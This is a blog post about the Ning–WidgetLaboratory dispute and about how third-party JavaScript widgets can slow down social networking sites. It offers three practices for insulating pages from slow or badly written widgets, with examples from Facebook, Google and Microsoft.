In an email to WL on August 2 (more than three weeks ago), CEO Gina Bianchini wrote “Our only goal is to have you build your products in such a way that doesn’t slow down the networks running your products or takedown the Ning Platform with what you’re doing. Both of those would result in us needing to shutdown WidgetLaboratory products and that’s has never been our first choice of options. Hopefully, you know this after 8 months of working with us.”

Ignoring the he said, she said nature of the communication between both companies, there is a legitimate concern that 3rd party widgets included on the pages of a Web site can degrade the performance to the extent that the site becomes unusably slow. In fact, TechCrunch has had similar problems with 3rd party widgets as Mike Arrington has mentioned on his personal blog which led to him excluding the widgets from his site.

Typically, widgets are embedded in a site by including references to Javascript hosted on a 3rd party site in the page's HTML. This means rendering the page is dependent on how quickly the script files can be downloaded from the 3rd party site AND how long it takes for the script to execute especially since it may also fetch data from one or more servers as well. Thus a slow server or a badly written script can make every page that embeds the widget unbearably slow to render. Given that the ability to embed widgets is a key feature of social networking sites, it is important for such sites to figure out how to isolate their user experience from badly written widgets or widgets hosted on slow Web servers.

Below are some best practices that have emerged on how social networking sites can immunize themselves from the kinds of problems Ning has had with WidgetLaboratory

  1. Host the Scripts Yourself: If you have a popular site, it is quite likely that you have more resources to handle lots of page views than the typical widget developer. Thus it makes sense to take away the dependency on externally hosted scripts by hosting the widgets yourself. Microsoft encourages developers to submit their gadgets to Windows Live Gallery if they want to build gadgets for my.live.com or Windows Live Spaces. For it's AJAX homepage service, Google does not require developers to submit gadgets to them for hosting but instead caches gadget data for hours at a time which means they are effectively hosting the gadgets themselves for the majority of the accesses by their users.

  2. Keep External Dependencies off of Pages that Need to Render Quickly: In many cases, it isn't feasible to host all of the data and content related to widgets that are being shown on your site. In that case, you should ensure that the key scenarios on your Web site are insulated from the problems caused by slow or broken 3rd party widgets. For example, on Facebook viewing someone's profile is a key part of the user experience that is important to make sure happens as quickly and as smoothly as possible. For this reason, Facebook caches all 3rd party content that shows up on a user's profile and requires applications to call Profile.SetFBML to add content to the profile instead of providing a way to directly embed widgets on a user's profile.

  3. Make It Clear Who Is to Blame if Things go Awry: One of the issues raised by Ning in their conflict with WidgetLaboratory is that user pages wouldn't render correctly or would show degraded performance due to WidgetLaboratory's widgets but Ning would get the support calls. This kind of user confusion is avoided if the user experience makes it clear when the failure of a page to render correctly is the fault of the external widget and when it is part of the hosting site. For example, Facebook Canvas Pages for applications make it clear that the user is using a 3rd party application and not part of the core Facebook experience. I've seen lots of user complain about the slowness of Scrabulous and Scrabble but never seen anyone who thought that Facebook was to blame and not the application developers.

Following some of these practices would have saved Ning and its users some of their current grief.

Now Playing: Ice Cube - Get Money, Spend Money, No Money


 

Categories: Platforms | Social Software